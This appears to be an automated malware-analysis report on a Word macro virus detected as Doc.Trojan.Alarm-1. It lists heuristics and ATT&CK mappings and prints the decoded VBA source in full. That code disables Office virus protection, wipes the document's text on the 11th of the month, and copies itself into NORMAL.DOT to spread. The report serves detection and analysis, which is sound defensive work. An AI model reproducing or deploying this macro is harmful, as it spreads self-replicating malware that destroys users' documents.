MALICIOUS
248
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample contains legacy WordBasic macro markers and an AutoOpen macro, indicating an attempt to execute malicious code upon opening. The macro attempts to copy itself to NORMAL.DOT, suggesting a persistence mechanism. The presence of 'ToolsMacro' and the explicit disabling of virus protection further support malicious intent.
Heuristics 5
-
ClamAV: Doc.Trojan.Alarm-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Alarm-1
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "AutoOpen" -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1522 bytes |
SHA-256: 50c5a0b102c068921885a5d066154affad4d69dfa4ec77c5f0882c4dbe174ec8 |
|||
|
Detection
ClamAV:
Doc.Trojan.Alarm-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "AutoOpen"
Public Sub MAIN()
On Error Resume Next
Dim MyFile$
Dim normal
Dim OkExist
Dim i
Dim TemplateName$
Dim active
Options.VirusProtection = False
If Day(Date) = 11 Then
Selection.WholeStory
Selection.Delete
Application.Quit savechanges:=wdSaveChanges
End If
MyFile$ = WordBasic.[FileName$]()
TemplateName$ = WordBasic.[DefaultDir$](2) + "\NORMAL.DOT"
normal = WordBasic.CountMacros(0)
OkExist = 0
For i = 1 To normal
If WordBasic.[MacroName$](i, 0) = "AutoOpen" Then OkExist = 1
Next i
If OkExist <> 1 Then
Application.OrganizerCopy Source:=MyFile$, Destination:=TemplateName$, Name:="AutoOpen", Object:=wdOrganizerObjectProjectItems
WordBasic.FileSave
End If
active = WordBasic.CountMacros(1)
OkExist = 0
For i = 1 To active
If WordBasic.[MacroName$](i, 1) = "AutoOpen" Then OkExist = 1
Next i
If OkExist <> 1 Then
Application.OrganizerCopy Source:=TemplateName$, Destination:=MyFile$, Name:="AutoOpen", Object:=wdOrganizerObjectProjectItems
WordBasic.FileSave
End If
End Sub
Sub ToolsMacro()
'Dialogs(wdDialogToolsMacro).Show
End Sub
Sub viewVBcode()
ShowVisualBasicEditor = False
End Sub
Sub FileTemplates()
'dialogs(wdfiletemplates).show
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.